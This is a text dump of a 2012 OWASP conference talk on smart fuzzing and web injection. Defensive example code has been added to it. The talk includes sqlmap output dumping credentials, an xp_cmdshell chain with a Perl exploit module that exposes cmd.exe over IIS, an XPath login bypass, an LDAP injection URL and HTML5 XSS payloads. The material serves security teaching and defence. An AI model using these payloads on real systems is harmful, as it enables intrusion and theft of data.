Find me if you can – smart fuzzing and discovery! shreeraj shah
1. FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
SHREERAJ SHAH
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
2. Who Are We?
http://shreeraj.blogspot.com
shreeraj@blueinfy.com
http://www.blueinfy.com
• Founder & Director
– Blueinfy Solutions Pvt. Ltd. (Brief)
– SecurityExposure.com
• Past experience
– Net Square, Chase, IBM & Foundstone
• Interest
– Web security research
• Published research
– Articles / Papers – SecurityFocus, O'Reilly, DevX, InformIT etc.
– Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.
– Advisories – .Net, Java servers etc.
• Books (Author)
– Web 2.0 Security – Defending Ajax, RIA and SOA
– Hacking Web Services
– Web Hacking
3. Well Known Fact!
• 90% of sites have one or more vulnerabilities.
• Exploitable? – YES!
• The most popular ones are SQLi & XSS
• SQLi – complete compromise of the application …
• XSS – control over the browser and its exploitation
4. Traditional Fuzzing – Not working
• Enterprise running on the 2.0 wave – Portal
• Technologies & Components – Dojo, Ajax, XML Services, Blog, Widgets
• Scans with tools/products failed
• Security issues and hacks
– SQL injection over XML
– Ajax-driven XSS
– Several XSS in the Blog component
– Several information leaks through JSON fuzzing
– CSRF on both XML and JS-Array
» HACKED
» DEFENSE
5. AppSec – Past, Present …
Source - OWASP
6. Enterprise Technology Trend
• 2007. Web services would rocket from $1.6 billion in 2004 to $34 billion. [IDC]
• 2008. Web Services or Service-Oriented Architecture (SOA) would surge ahead.
• 2009. Enterprise 2.0 in action and penetrating deeper into the corporate environment
• 2010. Flex/Cloud/API era.
• 2012. Mobile/HTML5 era.
7. Architecture
[Architecture diagram. Client: Browser with HTML / JS / DOM, Ajax, RIA (Flash), RSS feeds. Over the Internet: Web 2.0 Start page; content sources: Documents, News, Weather, Mails, Bank/Trade. Server side / End point: Blog, Database, Authentication, Application, Infrastructure, Web Services.]
8. Environment
[Environment diagram: Internet → DMZ → Trusted. Internet side: Web Client, Mobile, Web 2.0 Services (SOAP/JSON etc.). DMZ: Web Server (static pages only: HTML, HTM, etc.), Scripted Web Engine (dynamic pages: ASP, DHTML, PHP, CGI, etc.), Application Servers and Integrated Framework (ASP.NET on .Net Framework, J2EE App Server, Web Services, DB etc.). Trusted: Web Services, Internal/Corporate.]
9. Stack/Logic - Layers
[Layer diagram. Client side components (Browser): HTML 5, DOM, JS, XHR, Storage, WebSQL, WebSocket. Mobile: Android, iPhone/iPad. Other: Flash, AMF, Flex, XAML, Silverlight, WCF, .NET. Server side components: Presentation Layer, Business Layer, Data Access Layer, Authentication, Communication etc. Runtime, Platform, Operating System Components.]
10. Browser & Mobile – Arch.
[Browser & mobile architecture diagram. Presentation: HTML5 + CSS, Silverlight, Flash, API (Media, Geo etc.) & Messaging, Plug-In. Process & Logic: JavaScript, DOM/Events, Parser/Threads. Browser Native Network Services & Access: WebSQL, Cache, Storage, XHR 1 & 2, WebSocket, Plug-in Sockets, Network. Core Policies: SOP/CORS, Sandbox.]
11. Case study - Pageflakes
12. Case study - Pageflakes
Widgets
Web Services
22. JSON
// JavaScript object literal rather than strict JSON: the function-valued
// member means it can only be consumed by eval()-style loading.
message = {
    from : "john@example.com",
    to : "jerry@example.com",
    subject : "I am fine",
    body : "Long message here",
    showsubject : function(){ document.write(this.subject) }
};
24. Ajax driven site
25. Crawling with Ruby/Watir
26. Attacker's approach
• Fuzzing over HTTP
• Injecting faults with various sets of payloads
• Trying to raise an exception
• The exception message is thrown back as part of the HTTP response
• Scanning the response for signatures
• If a signature is found, it becomes an interesting entry point for exploitation
27. Challenges
• Technology fingerprinting
• Hidden calls
• Framework integration
• Multiple entry points
• Traditional fuzzing will not work
• Automated assessment can be a challenge
• Behavioral assessment with artificial intelligence
28. Old Approach
• Forcing SQL errors.
• Ideal for identifying database interfaces!
Request: http://192.168.7.120/details.asp?id='3
Query reaching the DB: select * from items where product_id = '3
29. Error – Now? – forget it
• Premature SQL query termination
• We now have an SQL injection point.
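The response-signature step from slides 26, 28 and 29 as an added example (not code from the deck): a small scanner that flags database error strings in HTTP response bodies, and shows that a customized error page yields no signature, which is the "blind" situation the next slide starts from. The response bodies and the signature subset are constructed here; the same check is what a defender runs against their own application to confirm error details are not leaking.

```python
import re

# Constructed sample response bodies (no real target): a verbose database
# error, a customized error page that hides it, and a normal page.
SAMPLE_RESPONSES = {
    "verbose": (
        "Microsoft OLE DB Provider for ODBC Drivers error '80040e14'\n"
        "[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation "
        "mark before the character string '3'.\n/details.asp, line 12"
    ),
    "custom_error": "<html><body>Sorry, something went wrong. Ref: 4711</body></html>",
    "normal": "<html><body><h1>Item 3</h1><p>$14.99</p></body></html>",
}

# Database error strings that should never reach an HTTP response.
# Illustrative subset; a real signature set is far longer.
ERROR_SIGNATURES = {
    "mssql": [
        r"OLE DB Provider for ODBC Drivers error",
        r"\[SQL Server\]Unclosed quotation mark",
        r"Incorrect syntax near",
    ],
    "mysql": [r"You have an error in your SQL syntax", r"mysql_fetch_array\(\)"],
    "oracle": [r"ORA-\d{5}"],
    "postgresql": [r"PG::SyntaxError", r"pg_query\(\)"],
}

def scan_response(body):
    """Return (dbms, matched text) for the first signature found in the
    body, or None. This is the 'scan response for signatures' step."""
    for dbms, patterns in ERROR_SIGNATURES.items():
        for pattern in patterns:
            match = re.search(pattern, body)
            if match:
                return dbms, match.group(0)
    return None

def classify(responses):
    """Scan every response. A customized error page produces None even when
    the injection worked: the point where the 'blind' techniques start."""
    return {name: scan_response(body) for name, body in responses.items()}

if __name__ == "__main__":
    for name, result in classify(SAMPLE_RESPONSES).items():
        verdict = f"signature found: {result}" if result else "no signature"
        print(f"{name:13s} -> {verdict}")
```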
30. Blind SQL Injection
• We have an SQL injection point, but it is not throwing any error message as part of its response. The application sends a customized error page that reveals no signature from which we could deduce the SQL flaw.
• Knowing the SQL injection point or loophole in the web application, xp_cmdshell seems to be working. But we can't say whether it is working or not, since it doesn't return any meaningful signature. This is "blind xp_cmdshell".
• The firewall doesn't allow outbound traffic, so we can't do ftp, tftp, ping etc. from the box to the Internet to confirm execution of the command on the target system.
• We don't know the actual path to the webroot, so we can't copy a file to a location that can be accessed over HTTP or HTTPS later to confirm execution of the command.
• Even if we know the path to the webroot and the directory structure, we may not find execute permission on it, so we can't copy cmd.exe or any other binary there and execute it over HTTP/HTTPS.
32. Running tools
• SQL Map or Absinthe
D:\tools\sqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 18:47:58
[18:48:00] [WARNING] the remote DMBS is not MySQL
[18:48:00] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
---
[*] shutting down at: 18:48:14
33. Enumeration…
D:\tools\sqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 --dbs
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 18:53:10
[18:53:12] [WARNING] the remote DMBS is not MySQL
[18:53:12] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
---
available databases [9]:
[*] CmdExec_example
[*] Dashboard
[*] catalog
[*] demotrading
[*] master
[*] model
[*] msdb
[*] order
[*] tempdb
[*] shutting down at: 18:55:07
34. Enumeration…
D:\tools\sqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --tables -D catalog
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 18:59:21
[18:59:22] [WARNING] the remote DMBS is not MySQL
[18:59:22] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
Database: catalog
[3 tables]
+--------------+
| auth |
| dtproperties |
| items |
+--------------+
35. Enumeration…
D:\tools\sqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --dump -D catalog -T auth
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 19:01:27
[19:01:28] [WARNING] the remote DMBS is not MySQL
[19:01:28] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
Database: catalog
Table: auth
[3 entries]
+--------+------+---------+
| access | user | pass |
+--------+------+---------+
| 101010 | dbo | john123 |
| 110011 | | great |
| 001011 | | loveit |
+--------+------+---------+
36. Blind Exploiting
Set WshShell = WScript.CreateObject("WScript.Shell")
Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%")
windir = ObjExec.StdOut.ReadLine()
Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT")
Set Dir = Root.Create("IIsWebVirtualDir", "secret")
Dir.Path = windir
Dir.AccessExecute = True
Dir.SetInfo
http://target/details.asp?id=1;exec+master..xp_cmdshell+'echo Set WshShell = WScript.CreateObject("WScript.Shell") > c:\secret.vbs'
…..
http://target/details.asp?id=1;exec+master..xp_cmdshell+'echo Dir.SetInfo >> c:\secret.vbs'
http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:\secret.vbs'
37. Get the cmd.exe
• Run command over HTTP/HTTPS
• http://target/secret/system32/cmd.exe?+/c+set
38. Running…
sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $path = $self->GetVar('RPATH');
    my $vhost = $self->GetVar('VHOST');
    my @url = split(/#/, $path);
    my @payload = (
        "EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject(\"WScript.Shell\")>c:\\secret.vbs'",
        "EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject(\"IIS://LocalHost/W3SVC/1/ROOT\")>>c:\\secret.vbs'",
        "EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create(\"IIsWebVirtualDir\",\"secret\")>>c:\\secret.vbs'",
        "EXEC+master..xp_cmdshell+'echo+Dir.Path+=+\"c:\\winnt\\system32\">>c:\\secret.vbs'",
        "EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:\\secret.vbs'",
        "EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:\\secret.vbs'",
        "EXEC+master..xp_cmdshell+'cscript+c:\\secret.vbs'"
    );
    $self->PrintLine("[+] Sending SQL injection payload...");
    for (my $count = 0; $count <= 6; $count++)
    ..
39. XPATH injection
• XPATH parsing standard error
• XPATH is a method available for XML parsing
• MS SQL Server provides an interface through which one can get table content in XML format.
• Once this is fetched one can run XPATH queries and obtain results.
• What if username/password checking is done using XPATH? – XPATH injection
40. XPATH injection
// Vulnerable example: the login values are concatenated straight into the
// XPath expression (the bypass is shown on the next slide).
using System.Xml;
using Microsoft.Data.SqlXml;

string fulltext = "";
string coString =
    "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass";
SqlXmlCommand co = new SqlXmlCommand(coString);
co.RootTag = "Credential";
co.CommandType = SqlXmlCommandType.Sql;
co.CommandText = "SELECT * FROM users for xml Auto";
XmlReader xr = co.ExecuteXmlReader();
xr.MoveToContent();
fulltext = xr.ReadOuterXml();
XmlDocument doc = new XmlDocument();
doc.LoadXml(fulltext);
// user and pass arrive from the login form without any validation
string credential = "//users[@username='" + user + "' and @password='" + pass + "']";
XmlNodeList xmln = doc.SelectNodes(credential);
if (xmln.Count > 0)
{
    // True: credentials accepted
}
else
{
    // False: credentials rejected
}
41. XPATH injection
string credential = "//users[@username='" + user + "' and @password='" + pass + "']";
• XPATH parsing can be leveraged by passing the following string: ' or 1=1 or ''='
• This is always true on the first node, so the user gets access as whoever the first user is.
Bingo!
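Slides 40 and 41 in Python as an added example (not the deck's code): the same concatenated predicate, why the ' or 1=1 or ''=' string makes it true, and the hardened form that encodes each input as an XPath string literal. The credential XML is constructed; the check is evaluated with the standard-library ElementTree, whose XPath subset has no `and`, so the two attribute tests are chained as `[..][..]`.

```python
import xml.etree.ElementTree as ET

# Constructed credential store, shaped like the 'for xml Auto' output the
# C# code loads: one <users> element per row, columns as attributes.
CREDENTIAL_XML = """<Credential>
  <users username="alice" password="Wonderland1" access="101010"/>
  <users username="bob" password="Bu1lder!" access="110011"/>
</Credential>"""

def vulnerable_xpath(user, pwd):
    """The slide's concatenation. With user = ' or 1=1 or ''=' the predicate
    becomes  '' or 1=1 or ''='' and @password='...'  and since 'and' binds
    tighter than 'or', it is true for every node: the first user logs in."""
    return "//users[@username='" + user + "' and @password='" + pwd + "']"

def xpath_literal(value):
    """Encode an untrusted string as an XPath 1.0 string literal. XPath has
    no escape character, so a value holding both quote kinds is split with
    concat(); the quotes then can never close the literal early."""
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    parts = ["'" + p + "'" for p in value.split("'")]
    return "concat(" + ", \"'\", ".join(parts) + ")"

def safe_xpath(user, pwd):
    """Same predicate as the slide, but each input is a literal, not syntax."""
    return ("//users[@username=" + xpath_literal(user)
            + " and @password=" + xpath_literal(pwd) + "]")

def authenticate(user, pwd):
    """Evaluate the hardened check against CREDENTIAL_XML. ElementTree's
    XPath subset has no 'and' (and no concat()), so the two attribute tests
    are chained as [..][..], which selects the same nodes."""
    doc = ET.fromstring(CREDENTIAL_XML)
    query = (".//users[@username=" + xpath_literal(user) + "]"
             "[@password=" + xpath_literal(pwd) + "]")
    return len(doc.findall(query)) > 0

if __name__ == "__main__":
    payload = "' or 1=1 or ''='"
    print("vulnerable:", vulnerable_xpath(payload, payload))
    print("hardened:  ", safe_xpath(payload, payload))
    print("alice/Wonderland1 ->", authenticate("alice", "Wonderland1"))
    print("payload/payload   ->", authenticate(payload, payload))
```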
42. LDAP Injection
Resource viewer:
http://www.something.com/res.cgi?type=1)(uid=*))
• Notice the injection
• Attacker bypasses the user id check
• (S)he can view all machines now
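Slide 42's LDAP case as an added example (not from the deck). The filter template (&(type=...)(uid=...)) is an assumption about how the resource viewer builds its query; the escaping follows RFC 4515, so the 1)(uid=*)) value becomes data rather than filter syntax, and closes_early() is a simple structural check that flags a filter whose parentheses close before the template ends.

```python
# Assumed filter template: the resource viewer is taken to build a search
# filter of this shape from the 'type' parameter and the caller's uid.
# (Assumption for this example; the slide shows only the request URL.)
FILTER_TEMPLATE = "(&(type={type})(uid={uid}))"

# RFC 4515 section 3: characters with special meaning in an assertion value,
# each replaced by a backslash and the two-digit hex code of the byte.
_LDAP_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}

def ldap_escape(value):
    """Encode an untrusted string as an LDAP filter assertion value."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)

def vulnerable_filter(type_param, uid):
    """The slide's situation: the parameter is pasted into the filter."""
    return FILTER_TEMPLATE.format(type=type_param, uid=uid)

def safe_filter(type_param, uid):
    """Same template, every input escaped: '*' and parentheses are data."""
    return FILTER_TEMPLATE.format(type=ldap_escape(type_param), uid=ldap_escape(uid))

def closes_early(filter_str):
    """True if the outermost '(' is closed before the end of the string,
    i.e. injected syntax ended the filter and left trailing text. Escaped
    parentheses are plain characters and do not affect the depth count."""
    depth = 0
    for index, ch in enumerate(filter_str):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0 and index != len(filter_str) - 1:
                return True
    return False

if __name__ == "__main__":
    injected = "1)(uid=*))"          # value from the slide's request URL
    for label, f in (("vulnerable", vulnerable_filter(injected, "bob")),
                     ("escaped", safe_filter(injected, "bob"))):
        print(f"{label:10s} {f}  closes early: {closes_early(f)}")
```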
43. SOAP – INJECTIONS & FUZZING
44. Fetching Calls
• Identifying services layer calls
45. Technology Identification
• Location can be obtained from UDDI as well, if already published.
• WSDL location [ Access Point ]
http://192.168.11.2/ws/dvds4less.asmx?wsdl
• .asmx indicates a .Net server from MS
46. SOAP request
<?xml version="1.0" encoding="utf-16"?>
<!-- SOAP Envelope -->
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
               xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
               xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
    <!-- Method call -->
    <getProductInfo xmlns="http://tempuri.org/">
      <id>1</id>  <!-- Input to the method -->
    </getProductInfo>
  </soap:Body>
</soap:Envelope>
47. SOAP response
<?xml version="1.0" encoding="utf-16"?>
<!-- SOAP Envelope -->
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
               xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
               xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
    <!-- Method response -->
    <getProductInfoResponse xmlns="http://tempuri.org/">
      <!-- Output of the method -->
      <getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult>
    </getProductInfoResponse>
  </soap:Body>
</soap:Envelope>
48. HTML5 & CLIENT SIDE FUZZING
49. HTML5 – Tags/Attributes/Events
• Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys)
• Attributes – form, submit, autofocus, sandbox, manifest, rel etc.
• Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc.
50. HTML5 – XSS
• Blacklists and filters will get bypassed
• Lots of new signatures and possible ways to execute scripts
• XSS can be injected from tags and events
• New attributes are available for XSS payloads
51. XSS variants
• Media tags
• Examples
– <video><source onerror="javascript:alert(1)">
– <video onerror="javascript:alert(1)"><source>
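Slides 50 and 51 as an added example (not from the deck): a blacklist filter of the kind that predates HTML5 passes both video/source variants untouched, while an allowlist sanitizer built on the standard-library html.parser drops them because it only emits what it was told to keep. The allowed tags, attributes and sample markup are constructed here.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed test input: the two media-tag variants from the slide plus a
# harmless fragment that a sanitizer must leave intact.
SAMPLES = [
    '<video><source onerror="javascript:alert(1)"></video>',
    '<video onerror="javascript:alert(1)"><source></video>',
    '<p>Hello <b>world</b> <a href="https://example.test/">link</a></p>',
]
# A blacklist filter of the pre-HTML5 kind: it strips <script> blocks and a
# fixed set of event handlers, and knows nothing about <video>/onerror.
_BLACKLIST = re.compile(
    r"<script\b.*?</script>|\s(?:onload|onclick|onmouseover)=\"[^\"]*\"",
    re.IGNORECASE | re.DOTALL)

def blacklist_filter(html):
    return _BLACKLIST.sub("", html)

ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a"}
ALLOWED_ATTRS = {"a": {"href"}}       # and href must be http(s)

class AllowlistSanitizer(HTMLParser):
    """Rebuild markup from parsed tokens, keeping only allowlisted tags and
    attributes; unknown tags, every on* handler and non-http(s) hrefs go."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name in ALLOWED_ATTRS.get(tag, ()) and value \
                    and value.lower().startswith(("http://", "https://")):
                kept.append(f' {name}="{escape(value)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        self.out.append(escape(data))

def allowlist_sanitize(html):
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)
```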
56. DOM with HTML5
57. DOM based XSS - Messaging
• It is a sleeping giant in Ajax applications coupled with Web Messaging
• Root cause
– The DOM is already loaded
– The application is a single page and the DOM stays the same
– Incoming information has to be injected into it using DOM calls such as eval()
– The information comes from untrusted sources
– JSONP usage
– Web Workers and callbacks
58. AJAX with HTML5 – DOM
• An Ajax function makes a back-end call
• The back-end returns a JSON stream (or another format) which gets injected into the DOM
• In some libraries the content type allows the response to be loaded in the browser directly
• In that case the DOM processing is bypassed…
59. APIs …
• A few other HTML5 APIs are interesting from a security standpoint
– File APIs – allow local file access and can be combined with ClickJacking and other attacks to obtain client files.
– Drag-Drop APIs – exploiting self-XSS and a few other tricks, hijacking cookies …
– Lots more to explore and defend…